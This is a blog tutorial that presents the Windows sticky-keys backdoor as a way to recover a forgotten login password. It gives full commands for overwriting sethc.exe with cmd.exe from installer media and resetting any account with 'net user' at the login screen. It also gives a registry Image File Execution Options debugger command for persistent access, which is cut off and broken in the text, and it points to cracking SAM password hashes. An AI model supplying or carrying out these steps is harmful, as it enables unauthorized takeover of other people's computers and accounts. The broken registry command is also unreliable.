Create Password Reset Backdoor to Bypass any Windows Login


If you are admitted to hospital for a long and finally come to your home and sit on your computer, to watch some cool movies and other stuff, and realized that, you forget Windows login password.  May you have different reasons of forgetting password still solution is here.

Know the Fact: - Most of the people try all the combinations they have remembered. If that doesn't work, they decided to format their Windows. A geek guy never takes such crude decision he finds the solution over that.

This article helps you to reset the forgotten password. No matter whether you're using older Windows XP or newly secured windows10.

Know About the Windows Security

Microsoft Windows operating system, stores user credential In SAM -SYSTEM ACCOUNT MANAGER file. For obvious reasons, you don't have the privilege to access that directly while running the OS.  Whenever you updated windows login password it stores hashes in SAM database file only.

There are the couple of software available which can import the SAM file and provide the hashes of the password. So you can get an original password by cracking the hashes with brute-force and dictionary attack. Crackstation is an online solution to crack the hashes.

MS - Windows again have two types of user accounts. Viz (i) local users account and (ii) domain users account. Whenever you sign in as a local user, your username and hash form password are stored on your computer itself. While domain account differs from local, When you log in with your Microsoft account rather than creating local username and password termed as a domain user account. The credentials of the domain user account are stored on the domain controller (live server) and not on the user's computer.

Create Backdoor First

You might know, whenever you press five times shift key, the sticky key mode will get turn on in windows OS. Microsoft introduced this feature for the physically disabled person who unable to press combination keys at a time. Sticky features you can be accessed once your computer turns on even on the login window also.

Here, we are creating a backdoor so it would be open Command Prompt (cmd) when you are pressing shift key five times instead of the sticky key.

Sticky key accessibility program is saved in windows with name sethc.exe. Now you have overwritten the sethc.exe with a cmd.exe file.

1. Boot your computer using windows installer USB/CD/DVD

2. Select Repair your computer link on the install windows screen

3. Click on troubleshoot option

4. Then, Select Advanced options

5. Choose Command Prompt tool

A command prompt is a powerful tool for the administrator. you could do lots of stuff with cmd including resetting old login password without entering previous one, add a new user as an administrator, delete the existing user and much more.

Now, In command prompt type below commands.

1. Enter the command to create a copy of sethc.exe file and press enter
 copy c:\windows\system32\sethc.exe c:\

2. Type below command to overwrite sethc.exe with cmd.exe without asking for confirmation and hit enter
copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe

3. Now exit the command prompt by typing command exit. Reboot your computer at the login screen and tap shift key five times. The command prompt will pop up for you.

4. Enter command net user to get the list of username available on pc.

5. Then, type net user username password, Replace username with your username and password with a new password.

6. Exit the command prompt and log in with your new password.

Now you log in successfully to your computer. To prevent other user exploiting the same method you did. Follow the same method up to launching command prompt tool using windows installer, and type below command to restore sticky keys.
copy /y c:\sethc.exe c:\windows\system32\sethc.exe

If you already log in to the computer, want to create the same? So would be reset password anytime without using windows installer disc whenever you forget. you can't do with above steps. Here is another simple alternative to archive the same.

1. Run the command prompt as an administrator mode

2. Paste below command and hit Enter key
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File 
Execution Options\sethc.exe" /v Debugger /t REG_SZ /d"C:\windows\system32\
If you get the success message, that means you have installed the backdoor. If not, be sure you logged in to the user with administrative privilege and don't forget to run the command prompt as administrator also.

3. Delete created backdoor using command
REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File 
Execution Options\sethc.exe

Check Now: - Make sure of drive name where you installed your system files (Probably C:/ or D:/). Replace C:/ with your corresponding drive name in respective above commands.

Let me know if you get any issues while creating backdoor via comment. If you find this guide helpful, do the share on Facebook and Twitter.

No comments